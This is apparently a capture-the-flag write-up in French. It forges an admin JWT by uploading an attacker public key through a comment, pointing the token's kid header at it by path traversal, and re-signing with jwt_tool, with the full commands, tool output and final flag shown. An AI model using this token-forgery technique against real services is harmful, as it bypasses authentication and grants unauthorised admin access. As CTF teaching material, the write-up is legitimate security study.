On commence par générer notre propre paires de clés RSA
openssl genpkey -algorithm RSA -out private.key
openssl rsa -pubout -in private.key -out public.key
On publie ensuite un commentaire avec uniquement notre clé publique dedans pour ensuite que le commentaire soit publié dans ../data/id-du-com . Car le key-0.pem est dans le public/keys , donc le kid final sera:
kid: public/keys/../data/6776d969-7a44-423a-8771-1e8f786c6e31
Ensuite, on change les valeurs de user et du kid grâce à jwt_tool
$ python3 jwt_tool.py eyJhbGciOiJSUzI1NiIsImtpZCI6ImtleS0wLnBlbSIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QtMTQ5YjJjNDMifQ.MPDSZqno2k0pnVoZNWgao0IVcKYLMAh8TbRsWW4K4m3MS9QNh3tyqQKwwD8KLMkeoVxL8SAF-r4FxrnGeVYa2_f66dGDkNi_R3L-Hccv4BruBAtTNfo7rUY9jOXLdODKg7_-s6v3zaLcXKGndbu-MVh56g5MDyDYMIGCdVfIeSvdas4kUx7Y0oKK0rfTCpbl-IaYpkW93NnH0ic2YSEw8BxImPD_mXXOGDGCOc6LhbajnHVQBD_R7S6PQcatSYg4cEYpB56_PwZIcm_x5fIc2jL4pDYppUXjOIgnScbHOwHMaG8H2ZJYgcBdBeu6fuIMG5BbQDt6ANAPyPrXXu0bOA \\
-hv kid -hv "../data/6776d969-7a44-423a-8771-1e8f786c6e31" -pv user -pv "admin" -S rs256 -pr private.key -T
Original JWT:
Token header values:
[1] alg = "RS256"
[2] kid = "key-0.pem"
[3] typ = "JWT"
Current value of kid is: key-0.pem
Please enter new value and hit ENTER
> ../data/6776d969-7a44-423a-8771-1e8f786c6e31
[1] alg = "RS256"
[2] kid = "../data/6776d969-7a44-423a-8771-1e8f786c6e31"
[3] typ = "JWT"
Token payload values:
[1] user = "guest-149b2c43"
Current value of user is: guest-149b2c43
Please enter new value and hit ENTER
> admin
[1] user = "admin"
jwttool_b6c328ca6fd83bf8813d53148ca0f755 - Tampered token - RSA Signing:
[+] eyJhbGciOiJSUzI1NiIsImtpZCI6Ii4uL2RhdGEvNjc3NmQ5NjktN2E0NC00MjNhLTg3NzEtMWU4Zjc4NmM2ZTMxIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ
On vérifie ensuite notre jwt avec notre clé publique pour s’assurer que la signature est correcte:
$ python3 jwt_tool.py -S rs256 -pk public.key -v eyJhbGciOiJSUzI1NiIsImtpZCI6Ii4uL2RhdGEvNjc3NmQ5NjktN2E0NC00MjNhLTg3NzEtMWU4Zjc4NmM2ZTMxIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ
Original JWT:
Token: {"alg":"RS256","kid":"../data/6776d969-7a44-423a-8771-1e8f786c6e31","typ":"JWT"}.{"user":"admin"}.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ
Token header values:
[+] alg = "RS256"
[+] kid = "../data/6776d969-7a44-423a-8771-1e8f786c6e31"
[+] typ = "JWT"
Token payload values:
[+] user = "admin"
Et enfin, on GET vers api/flag avec le nouveau jwt .
On flag CYBN{h4ck3r_2_h4ck3r5}